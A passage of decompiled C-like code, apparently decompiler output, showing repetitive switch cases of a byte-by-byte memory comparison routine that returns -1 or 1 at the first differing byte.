																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
																	if(_t1058 ==  *(_t1340 - 0x18)) {
																		goto L162;
																	} else {
																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t280 = _t1270 > 0;
																			__eflags = _t280;
																			_t1270 = (0 | _t280) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t286 = _t1270 > 0;
																				__eflags = _t286;
																				_t1270 = (0 | _t286) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t292 = _t1270 > 0;
																					__eflags = _t292;
																					_t1270 = (0 | _t292) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x15) & 0x000000ff) - ( *(_t1340 - 0x15) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t298 = _t1270 > 0;
																						__eflags = _t298;
																						_t1270 = (0 | _t298) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L162;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x19:
																	L242:
																	__eax =  *(__esi - 0x19);
																	__eflags =  *(__esi - 0x19) -  *(__edx - 0x19);
																	if( *(__esi - 0x19) ==  *(__edx - 0x19)) {
																		goto L255;
																	} else {
																		__eax =  *(__edx - 0x19) & 0x000000ff;
																		__ecx =  *(__esi - 0x19) & 0x000000ff;
																		__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t456 = __ecx > 0;
																			__eflags = _t456;
																			__eax = 0 | _t456;
																			__ecx = _t456 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x18) & 0x000000ff;
																			__eax =  *(__edx - 0x18) & 0x000000ff;
																			__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t462 = __ecx > 0;
																				__eflags = _t462;
																				__eax = 0 | _t462;
																				__ecx = _t462 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x17) & 0x000000ff;
																				__eax =  *(__edx - 0x17) & 0x000000ff;
																				__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t468 = __ecx > 0;
																					__eflags = _t468;
																					__eax = 0 | _t468;
																					__ecx = _t468 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x16) & 0x000000ff;
																					__eax =  *(__edx - 0x16) & 0x000000ff;
																					__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t474 = __ecx > 0;
																						__eflags = _t474;
																						__eax = 0 | _t474;
																						__ecx = _t474 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L255;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x1a:
																	L335:
																	__eax =  *(__esi - 0x1a);
																	__eflags =  *(__esi - 0x1a) -  *(__edx - 0x1a);
																	if( *(__esi - 0x1a) ==  *(__edx - 0x1a)) {
																		goto L348;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1a) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t638 = __ecx > 0;
																			__eflags = _t638;
																			__eax = 0 | _t638;
																			__ecx = _t638 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x19) & 0x000000ff;
																			__eax =  *(__edx - 0x19) & 0x000000ff;
																			__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t644 = __ecx > 0;
																				__eflags = _t644;
																				__eax = 0 | _t644;
																				__ecx = _t644 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x18) & 0x000000ff;
																				__eax =  *(__edx - 0x18) & 0x000000ff;
																				__ecx = ( *(__esi - 0x18) & 0x000000ff) - ( *(__edx - 0x18) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t650 = __ecx > 0;
																					__eflags = _t650;
																					__eax = 0 | _t650;
																					__ecx = _t650 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x17) & 0x000000ff;
																					__eax =  *(__edx - 0x17) & 0x000000ff;
																					__ecx = ( *(__esi - 0x17) & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t656 = __ecx > 0;
																						__eflags = _t656;
																						__eax = 0 | _t656;
																						__ecx = _t656 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L348;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x1b:
																	L428:
																	__eax =  *(__esi - 0x1b);
																	__eflags =  *(__esi - 0x1b) -  *(__edx - 0x1b);
																	if( *(__esi - 0x1b) ==  *(__edx - 0x1b)) {
																		goto L441;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x1b) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t816 = __ecx > 0;
																			__eflags = _t816;
																			__eax = 0 | _t816;
																			__ecx = _t816 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x1a) & 0x000000ff;
																			__eax =  *(__edx - 0x1a) & 0x000000ff;
																			__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t822 = __ecx > 0;
																				__eflags = _t822;
																				__eax = 0 | _t822;
																				__ecx = _t822 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x19) & 0x000000ff;
																				__eax =  *(__edx - 0x19) & 0x000000ff;
																				__ecx = ( *(__esi - 0x19) & 0x000000ff) - ( *(__edx - 0x19) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
